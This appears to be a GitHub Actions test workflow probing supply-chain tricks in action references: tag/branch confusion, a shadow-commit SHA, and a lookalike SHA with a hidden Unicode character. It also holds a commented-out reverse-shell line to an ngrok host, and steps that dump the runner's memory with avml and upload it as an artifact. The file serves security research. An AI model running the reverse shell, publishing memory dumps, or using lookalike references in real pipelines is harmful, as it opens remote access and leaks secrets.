name: Test

on:
  workflow_dispatch

permissions: {}

jobs:
  test:
    name: Test
    runs-on: ubuntu-latest
    timeout-minutes: 30
    steps:
      # Tag branch confusion, should output "Hello world! v1 tag"
      - uses: coderpatros/action-hello-world@v1
      # Shadow commit
      - uses: actions/setup-dotnet@a55eb9ae83b21bfc3efab1938edeffe211c9fb03
      # Unicode, these are not the same
      - uses: coderpatros/action-hello-world@6aa22f48b007348666f676eabda20e9884ed1a7f
      - uses: coderpatros/action-hello-world@6aa22f48b007348666f676eabda20e9884ed1a7f​
      #- run: sh -i >& /dev/tcp/0.tcp.au.ngrok.io/21635 0>&1
      - run: wget -O avml https://github.com/microsoft/avml/releases/download/v0.18.0/avml
      - run: |
          wget -O avml https://github.com/microsoft/avml/releases/download/v0.18.0/avml
          chmod +x avml
          sudo avml acquire --compress output.lime.compressed
          ls -l
      - uses: actions/upload-artifact@v7
        with:
          name: output.lime.compressed
          path: ./output.lime.compressed
